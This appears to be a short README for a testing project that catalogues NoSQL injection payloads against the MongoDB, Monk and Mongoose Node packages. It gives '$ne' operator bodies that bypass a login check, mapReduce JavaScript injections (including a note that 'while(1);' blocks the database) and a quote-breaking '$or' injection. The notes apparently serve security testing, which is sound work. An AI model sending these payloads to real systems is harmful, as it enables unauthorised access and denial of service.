# testing-service

## ARRAY INJECTIONS
 * MongoDB https://www.npmjs.com/package/mongodb
 * Monk https://www.npmjs.com/package/monk
 * Mongoose https://www.npmjs.com/package/mongoose

Body post
{
	"username": { "$ne": 1 },
	"password": { "$ne": 1 }
}


## JS INJECTIONS
 * MongoDB https://www.npmjs.com/package/mongodb
 * Monk https://www.npmjs.com/package/monk
 * Mongoose https://www.npmjs.com/package/mongoose

Body post
v1
{
	"map": "emit(this.cust_id, this.amount)", //while(1); blocks mongo
	"reduce": "return Array.sum(values)"
}

v2
{
	"map": "amount",
	"reduce": "return Array.sum(values);"
}


eval deprecated for mapReduce (maybe working on php with execute)


## OR INJECTIONS

Body post
{
	"username": "pavel', $or: [ {}, { 'a': 'a",
	"password": "'} ], $comment:'pavel"
}